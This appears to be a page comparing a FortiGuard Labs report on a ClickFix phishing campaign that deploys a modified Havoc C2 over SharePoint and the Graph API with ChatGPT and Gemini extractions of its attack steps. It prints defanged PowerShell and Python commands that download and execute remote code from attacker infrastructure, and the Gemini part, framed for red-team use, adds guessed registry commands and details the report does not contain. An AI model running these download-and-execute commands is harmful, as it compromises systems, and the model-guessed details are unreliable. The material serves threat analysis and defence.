Havoc: SharePoint with Microsoft Graph API turns into FUD C2

ChatGPT paged: Each PDF page to text, then ChatGPT 4o (detailed)
Gemini 2.0: Full PDF with gemini-2.0-flash (8k output token limit)
Gemini 2.5: Full PDF with gemini-2.5-flash-preview-05-20 (65k output tokens limit)
Original: All text extracted from PDF

Original Text
Havoc: SharePoint with Microsoft Graph API turns into FUD C2 \| FortiGuard Labs Yurren Wan Affected platforms: Microsoft Windows Impacted parties: Any organization Impact: Attackers gain control of the infected systems Severity level: High Havoc is a powerful command-and-control (C2) framework. Like other well-known C2 frameworks, such as Cobalt Strike, Silver, and Winos4.0, Havoc has been used in threat campaigns to gain full control over the target. Additionally, It is open-source and available on GitHub, making it easier for threat actors to modify it to evade detection. FortiGuard Labs recently discovered a phishing campaign that combines ClickFix and multi-stage malware to deploy a modified Havoc Demon Agent. The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted, well-known services. Figure 1 shows the attack chain. Figure 1: Attack flow Initial Access The attack campaign starts with a phishing email containing an HTML file as an attachment, as illustrated in Figure 2. It uses a brief explanation and an urgent tone to prompt the recipient to open the attachment immediately. Figure 2: The phishing e-mail The attachment, “Documents.html,” is a ClickFix attack that embeds a fake error message and instructions in HTML to deceive users into copying and pasting a malicious PowerShell command into their terminal or PowerShell, ultimately executing malicious code. Figure 3: Document.html using ClickFix social engineering tactic Decoding the base64-encoded string shown in Figure 3 reveals a PowerShell command that downloads and executes a remote PowerShell script. powershell -w h -c "iwr ‘hxxps://hao771[.]sharepoint.com/layouts/15/ download.aspx?share=EU7smZuKo- pDixZ26BSAaX0BVVcF5VkOc7qEvjsDSAH9OQ'\|iex" payload_20250112_074319.ps1 The Script file is hosted in SharePoint and controlled by the threat actor. When the script runs, it checks whether the execution environment is a sandbox by verifying the number of domain Python Shellcode Loader - payload_20250107_015913.py Like the PowerShell script, the Python script is hosted on the same SharePoint. It contains debug information written in Russian and serves as a shellcode loader. We executed the script directly with the Python interpreter in the terminal. The log displays “Выделение памяти” (memory allocation), "Запись в память” (write to memory), "Выполнение shellcode” (execution of shellcode), and " Завершение выполнения скрипта” (script execution completion) in sequence, indicating successful shellcode execution, as seen in Figure 6. Figure 6: Python script for shellcode execution KaynLdr KaynLdr is a Github Shellcode Loader designed to reflectively load an embedded DLL. It complicates analysis by using API hashing with a modified DJB2 algorithm and leverages resolved ntdll APIs for memory allocation and mapping. The instruction “call rax” executes the embedded DLL's entry point, as shown in Figure 7. computers. It then deletes all registry entries under HKCU:\Software\Microsoft with names starting with "zr" and adds the specified property as an infection marker, as shown in Figure 4. Figure 4: PowerShell script for sandbox evasion and infection tagging Next, the script verifies the existence of pythonw.exe. If it’s not found, it downloads the Python interpreter. Otherwise, it directly runs the Python script. Finally, the remote Python script is retrieved and executed in hidden windows to obscure malicious activity, as shown in Figure 5. Figure 5: PowerShell script for downloading and executing the remote Python script Figure 8: DemonMain in the modified Havoc Demon DLL and the retrieved APIs are stored in the structure beginning at address 0xb6 The second function, “SharePointC2Init,” initializes files on the actors' SharePoint site using the Microsoft Graph API. It first combines the hardcoded shared secret with the necessary parameters for a POST request. It then sends the request to the /token endpoint of the Microsoft Identity Platform to obtain access tokens for Microsoft Graph APIs. Figure 9: Access token request with a hardcoded shared secret Next, it utilizes the obtained token to create two files in SharePoint's default document library by making a PUT request, as shown in Figure 10. Figure 10: Creating a file in the root folder The Havoc AgentID generates the VictimID as a filename, concatenated with the suffix “pD9- tKout/pD9-tKin” to indicate their purpose. Table 1: Two files utilized for Sharepoint C2 to control the target. Figure 7: Executing the dll with KaynLDR shellcode loader Havoc Demon DLL Havoc is an open-source post-exploitation command and control framework used in red teaming exercises and attack campaigns to gain complete control over compromised targets. In this attack campaign, we observed that the threat actor uses Havoc in conjunction with the Microsoft Graph API to conceal C2 communication within well-known services. The modified Havoc Demon DLL still starts with DemonInit and uses the same hash algorithm as KaynLdr to retrieve the necessary APIs and initialize the configuration objects. The initial packet sent to C2 is a CheckIn request containing data gathered from the DemonMetaData function. In this step, the victim's information—such as Host Name, User Name, Domain Name, IP Address, Process Details, OS Information, whether the user has an elevated account, and the configuration in the Demon DLL—is sent to the C2 server. All content is encrypted using the AES-256 algorithm in CTR mode with a randomly generated 256-bit key and a 128-bit IV. Finally, it is combined with the header, as illustrated in Figure 11, before being sent to the C2 server via the TransportSend function. Figure 11: The contents of CheckIn request and Metadata Structure in Havoc Github The TransportSend function has been modified to communicate with the C2 by accessing two files: {VictimID}pD9-tKout and {VictimID}pD9-tKin. It updates the request to the “{VictimID}pD9-tKout” file and then retrieves the response from the C2 by using Microsoft Graph API with the GET method to access the contents of the ‘{VictimID} pD9-tKin’ file. If the response is successfully retrieved, the content of file '{VictimID}pD9-tKin' is immediately erased. Figure 12: The modified TransportSend function and the function “FetchInFile” Next, the content in the response is compared with the AgentID. If they match, the session.connected flag is set, and it enters the dispatcher routine to await new tasks from the attacker. In the dispatcher routine, the agent sends a 'Get Job' request and parses the response into Command ID, Request ID, and task. Although we only observed DEMON_COMMAND_NO_JOB (Command ID: 0xA) during our analysis, as shown in below, we found that the task would be decrypted and executed if a different command ID exists and is not 0xA in the program. Figure 13: Accessing the contents of the ‘{VictimID}pD9-tKin’ file The supported commands are the same as those in Havoc Github, as shown in Figure 14. They include gathering information about the target, file operations, command and payload execution, token manipulation, and Kerberos Attacks. Figure 14: The primary function for executing the Demon command Conclusion In addition to staying alert for phishing emails, guided messages that encourage opening a terminal or PowerShell must be handled with extra caution to prevent inadvertently downloading and executing malicious commands. In this article, we uncovered the execution flow and the altered open-source post-exploitation framework used in this attack. Public services once again play a crucial role in the attack campaign, now further integrated with modified Havoc Demon to hide malicious communication within the Microsoft Graph API, making identification and detection even more challenging. Fortinet Protections The malware described in this report are detected and blocked by FortiGuard Antivirus as: HTML/Agent.A5D4!tr PowerShell/MalwThreat!ebc5FT Python/Agent.DF60!tr W64/Havoc.L!tr FortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard Antivirus Service. The FortiGuard antivirus engine is part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected. The FortiGuard CDR (content disarm and reconstruction) service can disarm the malicious macros within the document. FortiGuard Labs provides the Backdoor.Havoc.Agent IPS signature to block Havoc C2 network communications. We also suggest that organizations take the free Fortinet Fortinet Certified Fundamentals (FCF) cybersecurity training. The training is designed to help users learn about today's threat landscape and introduces basic cybersecurity concepts and technology. FortiGuard IP Reputation and Anti-Botnet Security Service proactively block malware attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors,

Original Text

Havoc: SharePoint with Microsoft Graph API turns into FUD C2 | FortiGuard Labs Yurren Wan Affected platforms: Microsoft Windows Impacted parties: Any organization Impact: Attackers gain control of the infected systems Severity level: High Havoc is a powerful command-and-control (C2) framework. Like other well-known C2 frameworks, such as Cobalt Strike, Silver, and Winos4.0, Havoc has been used in threat campaigns to gain full control over the target. Additionally, It is open-source and available on GitHub, making it easier for threat actors to modify it to evade detection. FortiGuard Labs recently discovered a phishing campaign that combines ClickFix and multi-stage malware to deploy a modified Havoc Demon Agent. The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted, well-known services. Figure 1 shows the attack chain. Figure 1: Attack flow Initial Access The attack campaign starts with a phishing email containing an HTML file as an attachment, as illustrated in Figure 2. It uses a brief explanation and an urgent tone to prompt the recipient to open the attachment immediately. Figure 2: The phishing e-mail The attachment, “Documents.html,” is a ClickFix attack that embeds a fake error message and instructions in HTML to deceive users into copying and pasting a malicious PowerShell command into their terminal or PowerShell, ultimately executing malicious code. Figure 3: Document.html using ClickFix social engineering tactic Decoding the base64-encoded string shown in Figure 3 reveals a PowerShell command that downloads and executes a remote PowerShell script. powershell -w h -c "iwr ‘hxxps://hao771[.]sharepoint.com/layouts/15/ download.aspx?share=EU7smZuKo- pDixZ26BSAaX0BVVcF5VkOc7qEvjsDSAH9OQ'|iex" payload_20250112_074319.ps1 The Script file is hosted in SharePoint and controlled by the threat actor. When the script runs, it checks whether the execution environment is a sandbox by verifying the number of domain Python Shellcode Loader - payload_20250107_015913.py Like the PowerShell script, the Python script is hosted on the same SharePoint. It contains debug information written in Russian and serves as a shellcode loader. We executed the script directly with the Python interpreter in the terminal. The log displays “Выделение памяти” (memory allocation), "Запись в память” (write to memory), "Выполнение shellcode” (execution of shellcode), and " Завершение выполнения скрипта” (script execution completion) in sequence, indicating successful shellcode execution, as seen in Figure 6. Figure 6: Python script for shellcode execution KaynLdr KaynLdr is a Github Shellcode Loader designed to reflectively load an embedded DLL. It complicates analysis by using API hashing with a modified DJB2 algorithm and leverages resolved ntdll APIs for memory allocation and mapping. The instruction “call rax” executes the embedded DLL's entry point, as shown in Figure 7. computers. It then deletes all registry entries under HKCU:\Software\Microsoft with names starting with "zr" and adds the specified property as an infection marker, as shown in Figure 4. Figure 4: PowerShell script for sandbox evasion and infection tagging Next, the script verifies the existence of pythonw.exe. If it’s not found, it downloads the Python interpreter. Otherwise, it directly runs the Python script. Finally, the remote Python script is retrieved and executed in hidden windows to obscure malicious activity, as shown in Figure 5. Figure 5: PowerShell script for downloading and executing the remote Python script Figure 8: DemonMain in the modified Havoc Demon DLL and the retrieved APIs are stored in the structure beginning at address 0xb6 The second function, “SharePointC2Init,” initializes files on the actors' SharePoint site using the Microsoft Graph API. It first combines the hardcoded shared secret with the necessary parameters for a POST request. It then sends the request to the /token endpoint of the Microsoft Identity Platform to obtain access tokens for Microsoft Graph APIs. Figure 9: Access token request with a hardcoded shared secret Next, it utilizes the obtained token to create two files in SharePoint's default document library by making a PUT request, as shown in Figure 10. Figure 10: Creating a file in the root folder The Havoc AgentID generates the VictimID as a filename, concatenated with the suffix “pD9- tKout/pD9-tKin” to indicate their purpose. Table 1: Two files utilized for Sharepoint C2 to control the target. Figure 7: Executing the dll with KaynLDR shellcode loader Havoc Demon DLL Havoc is an open-source post-exploitation command and control framework used in red teaming exercises and attack campaigns to gain complete control over compromised targets. In this attack campaign, we observed that the threat actor uses Havoc in conjunction with the Microsoft Graph API to conceal C2 communication within well-known services. The modified Havoc Demon DLL still starts with DemonInit and uses the same hash algorithm as KaynLdr to retrieve the necessary APIs and initialize the configuration objects. The initial packet sent to C2 is a CheckIn request containing data gathered from the DemonMetaData function. In this step, the victim's information—such as Host Name, User Name, Domain Name, IP Address, Process Details, OS Information, whether the user has an elevated account, and the configuration in the Demon DLL—is sent to the C2 server. All content is encrypted using the AES-256 algorithm in CTR mode with a randomly generated 256-bit key and a 128-bit IV. Finally, it is combined with the header, as illustrated in Figure 11, before being sent to the C2 server via the TransportSend function. Figure 11: The contents of CheckIn request and Metadata Structure in Havoc Github The TransportSend function has been modified to communicate with the C2 by accessing two files: {VictimID}pD9-tKout and {VictimID}pD9-tKin. It updates the request to the “{VictimID}pD9-tKout” file and then retrieves the response from the C2 by using Microsoft Graph API with the GET method to access the contents of the ‘{VictimID} pD9-tKin’ file. If the response is successfully retrieved, the content of file '{VictimID}pD9-tKin' is immediately erased. Figure 12: The modified TransportSend function and the function “FetchInFile” Next, the content in the response is compared with the AgentID. If they match, the session.connected flag is set, and it enters the dispatcher routine to await new tasks from the attacker. In the dispatcher routine, the agent sends a 'Get Job' request and parses the response into Command ID, Request ID, and task. Although we only observed DEMON_COMMAND_NO_JOB (Command ID: 0xA) during our analysis, as shown in below, we found that the task would be decrypted and executed if a different command ID exists and is not 0xA in the program. Figure 13: Accessing the contents of the ‘{VictimID}pD9-tKin’ file The supported commands are the same as those in Havoc Github, as shown in Figure 14. They include gathering information about the target, file operations, command and payload execution, token manipulation, and Kerberos Attacks. Figure 14: The primary function for executing the Demon command Conclusion In addition to staying alert for phishing emails, guided messages that encourage opening a terminal or PowerShell must be handled with extra caution to prevent inadvertently downloading and executing malicious commands. In this article, we uncovered the execution flow and the altered open-source post-exploitation framework used in this attack. Public services once again play a crucial role in the attack campaign, now further integrated with modified Havoc Demon to hide malicious communication within the Microsoft Graph API, making identification and detection even more challenging. Fortinet Protections The malware described in this report are detected and blocked by FortiGuard Antivirus as: HTML/Agent.A5D4!tr PowerShell/MalwThreat!ebc5FT Python/Agent.DF60!tr W64/Havoc.L!tr FortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard Antivirus Service. The FortiGuard antivirus engine is part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected. The FortiGuard CDR (content disarm and reconstruction) service can disarm the malicious macros within the document. FortiGuard Labs provides the Backdoor.Havoc.Agent IPS signature to block Havoc C2 network communications. We also suggest that organizations take the free Fortinet Fortinet Certified Fundamentals (FCF) cybersecurity training. The training is designed to help users learn about today's threat landscape and introduces basic cybersecurity concepts and technology. FortiGuard IP Reputation and Anti-Botnet Security Service proactively block malware attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors,

Original Text	ChatGPT 4o Paged
Havoc: SharePoint with Microsoft Graph API turns into FUD C2 \| FortiGuard Labs Yurren Wan Affected platforms: Microsoft Windows Impacted parties: Any organization Impact: Attackers gain control of the infected systems Severity level: High Havoc is a powerful command-and-control (C2) framework. Like other well-known C2 frameworks, such as Cobalt Strike, Silver, and Winos4.0, Havoc has been used in threat campaigns to gain full control over the target. Additionally, It is open-source and available on GitHub, making it easier for threat actors to modify it to evade detection. FortiGuard Labs recently discovered a phishing campaign that combines ClickFix and multi-stage malware to deploy a modified Havoc Demon Agent. The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted, well-known services. Figure 1 shows the attack chain. Figure 1: Attack flow Initial Access The attack campaign starts with a phishing email containing an HTML file as an attachment, as illustrated in Figure 2. It uses a brief explanation and an urgent tone to prompt the recipient to open the attachment immediately.	Phase: Initial Access Technique: Phishing with Malicious HTML Attachment Procedure: The attacker sends a phishing email containing an HTML file. The email uses urgency to entice the recipient to open the attachment. Phase: Delivery Technique: Multi-stage Malware Delivery Procedure: The HTML attachment leads to the download of multiple malware stages hosted on a SharePoint site. Phase: Command and Control Technique: Havoc Framework with Graph API Procedure: Tool: Havoc Demon Agent (modified) The attacker uses a modified Havoc Demon Agent to communicate with the C2 server. Technique: Microsoft Graph API C2 communications are obscured within the Microsoft Graph API to leverage trusted, well-known services. Phase: Evasion Technique: Use of Legitimate Services for Communication Procedure: Hides communication using the Microsoft Graph API to appear legitimate and evade detection mechanisms.
Figure 2: The phishing e-mail The attachment, “Documents.html,” is a ClickFix attack that embeds a fake error message and instructions in HTML to deceive users into copying and pasting a malicious PowerShell command into their terminal or PowerShell, ultimately executing malicious code. Figure 3: Document.html using ClickFix social engineering tactic Decoding the base64-encoded string shown in Figure 3 reveals a PowerShell command that downloads and executes a remote PowerShell script. powershell -w h -c "iwr ‘hxxps://hao771[.]sharepoint.com/_layouts/15/ download.aspx?share=EU7smZuKo- pDixZ26BSAaX0BVVcF5VkOc7qEvjsDSAH9OQ'\|iex" payload_20250112_074319.ps1 The Script file is hosted in SharePoint and controlled by the threat actor. When the script runs, it checks whether the execution environment is a sandbox by verifying the number of domain	Phase: Initial Access Technique: Phishing via Malicious Document (HTML) Procedure: The attacker sends a phishing email with an attachment named "Documents.html" using the ClickFix social engineering tactic. The HTML file includes a fake error message to trick users into executing a malicious PowerShell command. Phase: Execution Technique: PowerShell Execution Command: `powershell -w h -c "iwr ‘hxxps://hao771[.]sharepoint.com/_layouts/15/download.aspx?share=EU7smZuKo-pDixZ26BSAaX0BVVcF5VkOc7qEvjsDSAH9OQ'\|iex"` Procedure: Decoding the base64-encoded string results in this PowerShell command that downloads and executes a remote script from a controlled SharePoint site. Phase: Defense Evasion Technique: Execution Environment Check Procedure: The downloaded PowerShell script checks if the environment is a sandbox by verifying the number of domains present.
Python Shellcode Loader - payload_20250107_015913.py Like the PowerShell script, the Python script is hosted on the same SharePoint. It contains debug information written in Russian and serves as a shellcode loader. We executed the script directly with the Python interpreter in the terminal. The log displays “Выделение памяти” (memory allocation), "Запись в память” (write to memory), "Выполнение shellcode” (execution of shellcode), and " Завершение выполнения скрипта” (script execution completion) in sequence, indicating successful shellcode execution, as seen in Figure 6. Figure 6: Python script for shellcode execution KaynLdr KaynLdr is a Github Shellcode Loader designed to reflectively load an embedded DLL. It complicates analysis by using API hashing with a modified DJB2 algorithm and leverages resolved ntdll APIs for memory allocation and mapping. The instruction “call rax” executes the embedded DLL's entry point, as shown in Figure 7.	Phase: Execution Technique: Python Shellcode Loader Procedure: A Python script is executed directly with the Python interpreter to load and execute shellcode. It performs memory allocation, writes shellcode to memory, and executes it. Likely Command: `bash python payload_20250107_015913.py` Phase: Execution Technique: Reflective DLL Loading with KaynLdr Procedure: KaynLdr is used to load an embedded DLL reflectively. It uses API hashing with a modified DJB2 algorithm, resolving `ntdll` APIs for memory allocation and DLL mapping. Key Instruction: `assembly call rax` (This executes the entry point of the embedded DLL.)
computers. It then deletes all registry entries under HKCU:\Software\Microsoft with names starting with "zr_" and adds the specified property as an infection marker, as shown in Figure 4. Figure 4: PowerShell script for sandbox evasion and infection tagging Next, the script verifies the existence of pythonw.exe. If it’s not found, it downloads the Python interpreter. Otherwise, it directly runs the Python script. Finally, the remote Python script is retrieved and executed in hidden windows to obscure malicious activity, as shown in Figure 5. Figure 5: PowerShell script for downloading and executing the remote Python script	Phase: Defense Evasion Technique: Registry Modification Procedure: Deletes all registry entries under `HKCU:\Software\Microsoft` with names starting with "zr_" and adds a specified property as an infection marker. Phase: Execution Technique: PowerShell Execution Command: Uses PowerShell to verify existence and execute scripts. If `pythonw.exe` is not found, it downloads the Python interpreter; otherwise, it executes the Python script. Procedure: Check for Python: Verify if `pythonw.exe` exists. Download and Execute: If `pythonw.exe` is missing, download the Python interpreter; if present, directly run the Python script. Execute in Hidden Window: Retrieve and execute the remote Python script in hidden windows to obscure activity.
Figure 8: DemonMain in the modified Havoc Demon DLL and the retrieved APIs are stored in the structure beginning at address 0xb6 The second function, “SharePointC2Init,” initializes files on the actors' SharePoint site using the Microsoft Graph API. It first combines the hardcoded shared secret with the necessary parameters for a POST request. It then sends the request to the /token endpoint of the Microsoft Identity Platform to obtain access tokens for Microsoft Graph APIs. Figure 9: Access token request with a hardcoded shared secret Next, it utilizes the obtained token to create two files in SharePoint's default document library by making a PUT request, as shown in Figure 10. Figure 10: Creating a file in the root folder The Havoc AgentID generates the VictimID as a filename, concatenated with the suffix “pD9- tKout/pD9-tKin” to indicate their purpose. Table 1: Two files utilized for Sharepoint C2 to control the target.	Phase: Command-and-Control (C2) Setup Technique: Utilizing Cloud Services for C2 Procedure: The threat actor uses the "SharePointC2Init" function to initialize files on their SharePoint site via Microsoft Graph API. This involves: Steps: Access Token Retrieval: Combine a hardcoded shared secret with necessary parameters for a POST request. Send the request to the `/token` endpoint of the Microsoft Identity Platform to obtain access tokens for Microsoft Graph APIs. File Creation in SharePoint: Utilize the obtained access token to make a PUT request. Execute the PUT request to create two files in the root folder of SharePoint's default document library. The filenames are generated using `AgentID` and concatenated with the suffix `pD9-tKout/pD9-tKin` to indicate their purpose. These procedures illustrate how the threat actor establishes and maintains communication with the compromised system using modified Havoc Demon tools and leveraging cloud-based services for stealthy command-and-control operations.
Figure 7: Executing the dll with KaynLDR shellcode loader Havoc Demon DLL Havoc is an open-source post-exploitation command and control framework used in red teaming exercises and attack campaigns to gain complete control over compromised targets. In this attack campaign, we observed that the threat actor uses Havoc in conjunction with the Microsoft Graph API to conceal C2 communication within well-known services. The modified Havoc Demon DLL still starts with DemonInit and uses the same hash algorithm as KaynLdr to retrieve the necessary APIs and initialize the configuration objects.	Phase: Execution Technique: DLL Execution via KaynLDR Shellcode Loader Procedure: The threat actor uses a modified Havoc Demon DLL, executed with the KaynLDR shellcode loader. The shellcode loader initializes by calling `DemonInit` and retrieves necessary APIs using a hash algorithm. Phase: Command and Control Technique: Abuse of Microsoft Graph API for C2 Procedure: The threat actor utilizes the Microsoft Graph API to conceal command and control (C2) communications within legitimate services, thereby blending malicious traffic with regular network activity. These actions illustrate the use of advanced techniques to execute malicious payloads and maintain covert C2 communications.
The initial packet sent to C2 is a CheckIn request containing data gathered from the DemonMetaData function. In this step, the victim's information—such as Host Name, User Name, Domain Name, IP Address, Process Details, OS Information, whether the user has an elevated account, and the configuration in the Demon DLL—is sent to the C2 server. All content is encrypted using the AES-256 algorithm in CTR mode with a randomly generated 256-bit key and a 128-bit IV. Finally, it is combined with the header, as illustrated in Figure 11, before being sent to the C2 server via the TransportSend function. Figure 11: The contents of CheckIn request and Metadata Structure in Havoc Github The TransportSend function has been modified to communicate with the C2 by accessing two files: {VictimID}pD9-tKout and {VictimID}pD9-tKin. It updates the request to the “{VictimID}pD9-tKout” file and then retrieves the response from the C2 by using Microsoft Graph API with the GET method to access the contents of the ‘{VictimID} pD9-tKin’ file. If the response is successfully retrieved, the content of file '{VictimID}pD9-tKin' is immediately erased.	Phase: Command and Control (C2) Communication Technique: Custom Command and Control Protocol Procedure: Initial Check-In: The victim's information is collected using the `DemonMetaData` function, which includes Host Name, User Name, Domain Name, IP Address, Process Details, OS Information, and account elevation status. Encryption: All data is encrypted using AES-256 in CTR mode with a randomly generated 256-bit key and a 128-bit IV. Data Transfer: The encrypted data is combined with a header before being sent to the C2 server via the `TransportSend` function. Communication is carried out by accessing two files: `{VictimID}pD9-tKout` for sending data and `{VictimID}pD9-tKin` for receiving data. The `Microsoft Graph API` is used with the `GET` method to access the contents of the `{VictimID}pD9-tKin` file to retrieve responses. If a response is successfully retrieved, the content of `{VictimID}pD9-tKin` is immediately erased to maintain operational security.
Figure 12: The modified TransportSend function and the function “FetchInFile” Next, the content in the response is compared with the AgentID. If they match, the session.connected flag is set, and it enters the dispatcher routine to await new tasks from the attacker. In the dispatcher routine, the agent sends a 'Get Job' request and parses the response into Command ID, Request ID, and task. Although we only observed DEMON_COMMAND_NO_JOB (Command ID: 0xA) during our analysis, as shown in below, we found that the task would be decrypted and executed if a different command ID exists and is not 0xA in the program. Figure 13: Accessing the contents of the ‘{VictimID}pD9-tKin’ file The supported commands are the same as those in Havoc Github, as shown in Figure 14. They include gathering information about the target, file operations, command and payload execution, token manipulation, and Kerberos Attacks.	Phase: Command and Control Technique: Communication via Encrypted Tasks Procedure: The agent sends a 'Get Job' request to the command and control server. The response is parsed into Command ID, Request ID, and task. If the command ID is not 0xA, the task is decrypted and executed. Phase: Execution Technique: Command Execution Procedure: Commands supported mirror those in Havoc GitHub, which include system information gathering, file operations, and payload execution. Phase: Credential Access Technique: Token Manipulation and Kerberos Attacks Procedure: The threat actor can perform token manipulation and execute Kerberos attacks as supported by the Havoc platform. Phase: Persistence Technique: Response Parsing and Task Execution Procedure: Upon matching the AgentID, the system sets a session.connected flag and enters a dispatcher routine, allowing for continued task execution.
Figure 14: The primary function for executing the Demon command Conclusion In addition to staying alert for phishing emails, guided messages that encourage opening a terminal or PowerShell must be handled with extra caution to prevent inadvertently downloading and executing malicious commands. In this article, we uncovered the execution flow and the altered open-source post-exploitation framework used in this attack. Public services once again play a crucial role in the attack campaign, now further integrated with modified Havoc Demon to hide malicious communication within the Microsoft Graph API, making identification and detection even more challenging. Fortinet Protections The malware described in this report are detected and blocked by FortiGuard Antivirus as: HTML/Agent.A5D4!tr PowerShell/MalwThreat!ebc5FT Python/Agent.DF60!tr W64/Havoc.L!tr FortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard Antivirus Service. The FortiGuard antivirus engine is part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected. The FortiGuard CDR (content disarm and reconstruction) service can disarm the malicious macros within the document. FortiGuard Labs provides the Backdoor.Havoc.Agent IPS signature to block Havoc C2 network communications. We also suggest that organizations take the free Fortinet Fortinet Certified Fundamentals (FCF) cybersecurity training. The training is designed to help users learn about today's threat landscape and introduces basic cybersecurity concepts and technology. FortiGuard IP Reputation and Anti-Botnet Security Service proactively block malware attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors,	Phase: Execution Technique: Malicious PowerShell Execution Procedure: The threat actor manipulates PowerShell to execute commands that result in downloading and executing malicious code. This is integrated into phishing emails and guided messages. Phase: C2 Communication Technique: Modified Havoc Demon Framework Procedure: The attackers use a modified version of the open-source Havoc Demon post-exploitation framework. They hide malicious communication within the Microsoft Graph API to make detection more difficult. This involves encoding and embedding C2 traffic within legitimate API calls. Phase: Defense Evasion Technique: Use of Public Services Procedure: Incorporation of public services, like Microsoft Graph API, to blend malicious network traffic with legitimate service calls. This obfuscates the command and control (C2) communication, making it harder for defenders to detect anomalies.

Gemini 2.0

Gemini 2.0
Model: gemini-2.0-flash OK, here's the structured extraction of the TTPs from the provided CTI report, formatted for red team use. Phase: Initial Access Technique: Spear Phishing with HTML Attachment Procedure: The attacker sends a spear-phishing email containing an HTML file attachment ("Documents.html") that serves as a ClickFix attack. The email prompts the recipient to open the attachment. Phase: Execution Technique: ClickFix Social Engineering Leading to PowerShell Execution Procedure: The HTML attachment displays a fake error message and provides instructions for the user to copy and paste a malicious PowerShell command into their terminal or PowerShell. Command: `powershell -w h -c "iwr ‘hxxps://hao771[.]sharepoint.com/_layouts/15/download.aspx?share=EU7smZuKo-pDixZ26BSAaXoBVVcF5VkOc7qEvjsDSAH9OQ'\|iex"` Phase: Persistence/Privilege Escalation Technique: Script Execution Procedure: The PowerShell script downloaded from the SharePoint site checks if the execution environment is a sandbox by verifying the number of domain computers. If fewer than 10 domain computers exist, the script exits. It then deletes registry entries starting with "zr_" under `HKCU:\Software\Microsoft`, and adds a specific property as an infection marker. Command (Likely Registry Modification): `Remove-ItemProperty -Path 'HKCU:\Software\Microsoft' -Name <RegistryNamePrefix>* -Force` Command (Likely Registry Addition): `Set-ItemProperty -Path 'HKCU:\Software\Microsoft' -Name <RegistryName> -Value <Value> -Force` Technique: Remote Python Script Execution Procedure: The PowerShell script verifies if pythonw.exe exists. If not, it downloads the Python interpreter. It then executes a remote Python script in a hidden window. Command (Remote Python Script Download and Execution): Python code snippet: `import urllib.request,ssl;url='hxxps://hao771[.]sharepoint.com/...'; context=ssl.create_unverified_context(); exec(urllib.request.urlopen(url,context=context).read().decode('utf-8'))` This is used in pythonw.exe arguments as `-c` argument: `-c "import urllib.request,..."` Phase: Command and Control Technique: Shellcode Loading with KaynLdr Procedure: The Python script loads and executes shellcode using a shellcode loader. KaynLdr is used to reflectively load an embedded DLL, complicating analysis by using API hashing with a modified DJB2 algorithm. Procedure: The loaded DLL (Havoc Demon) uses the Microsoft Graph API to conceal C2 communications. Technique: SharePoint C2 Procedure: The Havoc agent uses the Microsoft Graph API to create two files in a default document library on the attacker's SharePoint site for C2 communications. The files are named `{VictimID}pD9-tKout` (used to transmit victim information) and `{VictimID}pD9-tKin` (used to receive C2 commands). A shared secret is used to acquire access tokens for the Microsoft Graph API. Phase: Exfiltration & Command Execution Technique: Custom C2 Protocol via SharePoint Procedure: After CheckIn, the agent accesses 2 files, {VictimID}pD9-tKout and {VictimID}pD9-tKin, in order to communicate with the C2. The agent updates the request to file {VictimID}pD9-tKout, then retrieves the response by accessing file {VictimID}pD9-tKin. The agent then erases the content immediately. Procedure: The report highlights use of specific commands but states the commands supported are similar to that of Havoc github and included; gathering information, file operations, command & payload execution, token manipulation and Kerberos attacks.

Model: gemini-2.0-flash

OK, here's the structured extraction of the TTPs from the provided CTI report, formatted for red team use.

Phase: Initial Access

Technique: Spear Phishing with HTML Attachment
Procedure: The attacker sends a spear-phishing email containing an HTML file attachment ("Documents.html") that serves as a ClickFix attack. The email prompts the recipient to open the attachment.

Phase: Execution

Technique: ClickFix Social Engineering Leading to PowerShell Execution
Procedure: The HTML attachment displays a fake error message and provides instructions for the user to copy and paste a malicious PowerShell command into their terminal or PowerShell.
Command: powershell -w h -c "iwr ‘hxxps://hao771[.]sharepoint.com/_layouts/15/download.aspx?share=EU7smZuKo-pDixZ26BSAaXoBVVcF5VkOc7qEvjsDSAH9OQ'|iex"

Phase: Persistence/Privilege Escalation

Technique: Script Execution
Procedure: The PowerShell script downloaded from the SharePoint site checks if the execution environment is a sandbox by verifying the number of domain computers. If fewer than 10 domain computers exist, the script exits. It then deletes registry entries starting with "zr_" under HKCU:\Software\Microsoft, and adds a specific property as an infection marker.
Command (Likely Registry Modification): Remove-ItemProperty -Path 'HKCU:\Software\Microsoft' -Name <RegistryNamePrefix>* -Force
Command (Likely Registry Addition): Set-ItemProperty -Path 'HKCU:\Software\Microsoft' -Name <RegistryName> -Value <Value> -Force
Technique: Remote Python Script Execution
Procedure: The PowerShell script verifies if pythonw.exe exists. If not, it downloads the Python interpreter. It then executes a remote Python script in a hidden window.
Command (Remote Python Script Download and Execution): Python code snippet: import urllib.request,ssl;url='hxxps://hao771[.]sharepoint.com/...'; context=ssl.create_unverified_context(); exec(urllib.request.urlopen(url,context=context).read().decode('utf-8')) This is used in pythonw.exe arguments as -c argument: -c "import urllib.request,..."

Phase: Command and Control

Technique: Shellcode Loading with KaynLdr
Procedure: The Python script loads and executes shellcode using a shellcode loader. KaynLdr is used to reflectively load an embedded DLL, complicating analysis by using API hashing with a modified DJB2 algorithm.
Procedure: The loaded DLL (Havoc Demon) uses the Microsoft Graph API to conceal C2 communications.
Technique: SharePoint C2
Procedure: The Havoc agent uses the Microsoft Graph API to create two files in a default document library on the attacker's SharePoint site for C2 communications. The files are named {VictimID}pD9-tKout (used to transmit victim information) and {VictimID}pD9-tKin (used to receive C2 commands). A shared secret is used to acquire access tokens for the Microsoft Graph API.

Phase: Exfiltration & Command Execution

Technique: Custom C2 Protocol via SharePoint
